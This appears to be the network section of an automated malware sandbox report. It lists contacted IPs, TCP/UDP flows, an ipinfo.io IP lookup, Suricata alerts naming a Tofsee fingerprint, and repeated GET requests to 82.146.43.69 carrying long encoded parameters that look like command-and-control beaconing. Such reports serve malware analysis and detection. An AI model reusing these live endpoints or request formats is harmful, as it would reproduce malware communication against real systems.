Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 104.21.80.171 | Active | Moloch |
| 162.0.210.44 | Active | Moloch |
| 162.0.220.187 | Active | Moloch |
| 164.124.101.2 | Active | Moloch |
| 172.217.25.14 | Active | Moloch |
| 198.13.62.186 | Active | Moloch |
| 34.117.59.81 | Active | Moloch |
| 82.146.43.69 | Active | Moloch |
| 192.243.59.20 | Active | Moloch |
| 213.174.155.130 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| ipinfo.io | 34.117.59.81 |
- TCP Requests
-
-
104.21.80.171:80 192.168.56.102:49956
-
111.90.146.149:80 192.168.56.102:49957
-
162.0.210.44:443 192.168.56.102:49865
-
162.0.210.44:443 192.168.56.102:49873
-
162.0.210.44:443 192.168.56.102:49874
-
162.0.210.44:443 192.168.56.102:49876
-
172.67.153.74:443 192.168.56.102:49898
-
192.168.56.102:49797 172.217.25.14:443
-
192.168.56.102:49827 34.117.59.81:443ipinfo.io
-
192.168.56.102:49826 82.146.43.69:80
-
192.168.56.102:49828 82.146.43.69:80
-
192.243.59.20:443 192.168.56.102:49885
-
192.243.59.20:443 192.168.56.102:49886
-
192.243.59.20:443 192.168.56.102:49887
-
213.174.155.130:80 192.168.56.102:49955
-
- UDP Requests
-
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
192.168.56.102:56758 239.255.255.250:3702
-
198.13.62.186:53 192.168.56.102:61999
-
GET
200
https://ipinfo.io/json
REQUEST
RESPONSE
BODY
GET /json HTTP/1.1
User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586
Host: ipinfo.io
Connection: Keep-Alive
HTTP/1.1 200 OK
access-control-allow-origin: *
x-content-type-options: nosniff
content-type: application/json; charset=utf-8
content-length: 244
date: Sat, 12 Jun 2021 09:25:15 GMT
x-envoy-upstream-service-time: 2
Via: 1.1 google
Alt-Svc: clear
GET
200
http://82.146.43.69/externalpython_Processorgame.php?GsIcs29GtjzW7s=B66jq6seOp&5WNGb9aNmsEibBFJ0AJylIl35k=7cYN3w47n3mHz&024460c38d1a807278c8431ced0b0904=4b7440ed015fe8fe3058245b94b19e91&fc3c3634ae1d8921db8402bb95b1565b=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&GsIcs29GtjzW7s=B66jq6seOp&5WNGb9aNmsEibBFJ0AJylIl35k=7cYN3w47n3mHz
REQUEST
RESPONSE
BODY
GET /externalpython_Processorgame.php?GsIcs29GtjzW7s=B66jq6seOp&5WNGb9aNmsEibBFJ0AJylIl35k=7cYN3w47n3mHz&024460c38d1a807278c8431ced0b0904=4b7440ed015fe8fe3058245b94b19e91&fc3c3634ae1d8921db8402bb95b1565b=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&GsIcs29GtjzW7s=B66jq6seOp&5WNGb9aNmsEibBFJ0AJylIl35k=7cYN3w47n3mHz HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586
Host: 82.146.43.69
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 12 Jun 2021 09:24:54 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 396
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET
200
http://82.146.43.69/externalpython_Processorgame.php?GsIcs29GtjzW7s=B66jq6seOp&5WNGb9aNmsEibBFJ0AJylIl35k=7cYN3w47n3mHz&bb3ddb2219372e793395286708ab7007=gM4UWNmFGZwgjN2AjNyQWMwQmZyITOzkzNxEDN2QzYiZDZ5ADOkhDZyEDNykjM1ITOzAjNxYTO&fc3c3634ae1d8921db8402bb95b1565b=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&cd8054709f69449745e1d9b91abbd92e=d1nIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W&c7b940f6c4fda35f1571cd148ec3856b=d1nIiojI1UjYkljZidzMlZjYwYWNzUDO3YzYwIjYyITNmJ2N5EmIsIyYhRjY4cjZ0M2M0IGO2EGMycTN1QDMiVWZiNDZ1YzMlV2N0U2N0MjZiojIidzY2QGOkVWMzETNjFTMhJGO2ITY1EWOlNTOzIjYjdjIsICNwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjNiojIycTMxcTOkhzMzMTO2U2N4QzMxMjZ5czN4U2N4QmNygjI7xSfikjSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSPRXRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5o0QhBjVYllb1cVY65EWhRXODhlds1GT2pVbiBnQYFmd3FDTjBnejdnUIR2bKl2TpV1VitmRXpVeKNETpd3VkZnVyUld3ZVWw5EWRl2bqlEb1IjY2Y1ViBnUul0cJlmT0UkeNdXSp9Ua3dVWw40MidnSDxUawIjYqZ1RixmUGlEaW12Y2RXRJJTW65EMNZVUp9maJ5mSzIWa3lWSwcmeOVDNp5UeFRET3llaOFDN55keJl2Tp1kMiNnSDxUaJFzUp9maJVjSIRWdWNjYqp0QMl2dXRmdWJTVp9maJVXOXFmbW12YpdXaJNnVzIGbOxWS2k0UlBDbykVa3lWS3VFVNVXU61Ee0M0T3lkaMFzYU1UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeJREZ6Z1Rkl2bqlEbxcVWPpEWapnVsl0cJlXURFTaNlXUxUlRSxWS2k0UaRnRtRFRCxWSzl0QNVXSqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUTNiRWOmJ2NzUmNiBjZ1MTN4cjNjBjMiJjM1YmY3kTYiwiIhdDM1E2M5ITOmN2YxQTZzQjZ5U2MzYjZwUTNzU2NlBTYjNTM2MGNzIiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W
REQUEST
RESPONSE
BODY
GET /externalpython_Processorgame.php?GsIcs29GtjzW7s=B66jq6seOp&5WNGb9aNmsEibBFJ0AJylIl35k=7cYN3w47n3mHz&bb3ddb2219372e793395286708ab7007=gM4UWNmFGZwgjN2AjNyQWMwQmZyITOzkzNxEDN2QzYiZDZ5ADOkhDZyEDNykjM1ITOzAjNxYTO&fc3c3634ae1d8921db8402bb95b1565b=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&cd8054709f69449745e1d9b91abbd92e=d1nIjFGNihzNmRzYzQjY4YTYwIzN1UDNwIWZlJ2MkVjNzUWZ3QTZ3QzMmJiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W&c7b940f6c4fda35f1571cd148ec3856b=d1nIiojI1UjYkljZidzMlZjYwYWNzUDO3YzYwIjYyITNmJ2N5EmIsIyYhRjY4cjZ0M2M0IGO2EGMycTN1QDMiVWZiNDZ1YzMlV2N0U2N0MjZiojIidzY2QGOkVWMzETNjFTMhJGO2ITY1EWOlNTOzIjYjdjIsICNwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjNiojIycTMxcTOkhzMzMTO2U2N4QzMxMjZ5czN4U2N4QmNygjI7xSfikjSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSPRXRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5o0QhBjVYllb1cVY65EWhRXODhlds1GT2pVbiBnQYFmd3FDTjBnejdnUIR2bKl2TpV1VitmRXpVeKNETpd3VkZnVyUld3ZVWw5EWRl2bqlEb1IjY2Y1ViBnUul0cJlmT0UkeNdXSp9Ua3dVWw40MidnSDxUawIjYqZ1RixmUGlEaW12Y2RXRJJTW65EMNZVUp9maJ5mSzIWa3lWSwcmeOVDNp5UeFRET3llaOFDN55keJl2Tp1kMiNnSDxUaJFzUp9maJVjSIRWdWNjYqp0QMl2dXRmdWJTVp9maJVXOXFmbW12YpdXaJNnVzIGbOxWS2k0UlBDbykVa3lWS3VFVNVXU61Ee0M0T3lkaMFzYU1UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeJREZ6Z1Rkl2bqlEbxcVWPpEWapnVsl0cJlXURFTaNlXUxUlRSxWS2k0UaRnRtRFRCxWSzl0QNVXSqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUTNiRWOmJ2NzUmNiBjZ1MTN4cjNjBjMiJjM1YmY3kTYiwiIhdDM1E2M5ITOmN2YxQTZzQjZ5U2MzYjZwUTNzU2NlBTYjNTM2MGNzIiOiI2NjZDZ4QWZxMTM1MWMxEmY4YjMhVTY5U2M5MjMiN2NiwiI0AzMmVGMwQzYwEmM5QWN3MWO4QGNkJGZ5QzMzQTMwM2YlBDN0MTM2IiOiIzNxEzN5QGOzMzM5YTZ3gDNzEzMmlzN3gTZ3gDZ2IDOis3W HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586
Host: 82.146.43.69
HTTP/1.1 200 OK
Date: Sat, 12 Jun 2021 09:25:21 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 104
Content-Type: text/html; charset=UTF-8
ICMP traffic
| Source | Destination | ICMP Type | Data |
|---|---|---|---|
| 192.168.56.102 | 198.13.62.186 | 3 | |
| 192.168.56.102 | 198.13.62.186 | 3 | |
| 192.168.56.102 | 198.13.62.186 | 3 | |
| 192.168.56.102 | 198.13.62.186 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.102:49827 -> 34.117.59.81:443 | 2025331 | ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) | Device Retrieving External IP Address Detected |
| TCP 192.168.56.102:49827 -> 34.117.59.81:443 | 906200022 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 34.117.59.81:443 -> 192.168.56.102:49827 | 2025330 | ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) | Device Retrieving External IP Address Detected |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLS 1.2 192.168.56.102:49827 34.117.59.81:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1D4 | CN=ipinfo.io | 43:26:3d:5a:7e:4a:bc:f7:21:b5:d0:00:f1:49:6c:a5:bf:d1:ff:e7 |
Snort Alerts
No Snort Alerts